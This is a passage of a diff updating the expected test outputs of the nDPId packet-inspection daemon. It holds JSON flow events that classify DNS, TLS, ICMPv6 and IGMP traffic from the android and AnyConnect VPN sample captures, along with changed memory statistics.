+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","packets-captured":500,"packets-processed":475,"total-skipped-flows":0,"total-l4-payload-len":101980,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":60,"total-detection-updates":42,"total-updates":0,"current-active-flows":0,"total-active-flows":63,"total-idle-flows":63,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":381,"global_ts_msec":1582454872047} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","packets-captured":500,"packets-processed":475,"total-skipped-flows":0,"total-l4-payload-len":101980,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":60,"total-detection-updates":43,"total-updates":0,"current-active-flows":0,"total-active-flows":63,"total-idle-flows":63,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":382,"global_ts_msec":1582454872047} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 500/475 ~~ skipped flows.............: 0 @@ -387,9 +388,9 @@ ~~ total active/idle flows...: 63/63 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6109004 bytes -~~ total memory freed........: 6109004 bytes -~~ total allocations/frees...: 119080/119080 +~~ total memory allocated....: 6240347 bytes +~~ total memory freed........: 6240347 bytes +~~ total allocations/frees...: 121841/121841 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2361 chars diff --git a/test/results/anyconnect-vpn.pcap.out b/test/results/anyconnect-vpn.pcap.out index 4f2047ac8..9984eac4a 100644 --- a/test/results/anyconnect-vpn.pcap.out +++ b/test/results/anyconnect-vpn.pcap.out @@ -8,92 +8,92 @@ 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"} 00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569687241452,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":56,"pkt_l4_len":8,"thread_ts_msec":1569687241452,"pkt":"AQBeAAABLH6BsEqhCABGwAAgGHkAAAECIZ0KAAAB4AAAAZQEAAARCu71AAAAAGluZyBzeXNjZmc="} -00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 